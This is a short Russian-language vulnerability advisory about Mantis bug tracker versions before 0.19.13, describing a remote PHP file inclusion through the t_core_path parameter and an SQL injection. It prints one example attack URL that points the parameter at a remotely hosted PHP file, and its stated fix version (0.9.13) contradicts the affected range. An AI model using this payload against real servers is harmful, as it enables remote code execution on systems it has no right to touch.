Дата публикации: | 28.10.2005 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 2236 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Mantis версии до 0.19.13
Описание: 1. Уязвимость существует при обработке входных данных в параметре t_core_path в сценарии bug_sponsorship_list_view_inc.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Для успешной эксплуатации уязвимости должна быть включена опция register_globals. Пример:
http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=http://[host]/[file].php? 2. SQL-инъекция возможна из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе. URL производителя: www.mantisbt.org Решение: Установите последнюю версию (0.9.13) с сайта производителя. Источник: |
|
Ссылки: | Mantis "t_core_path" File Inclusion Vulnerability |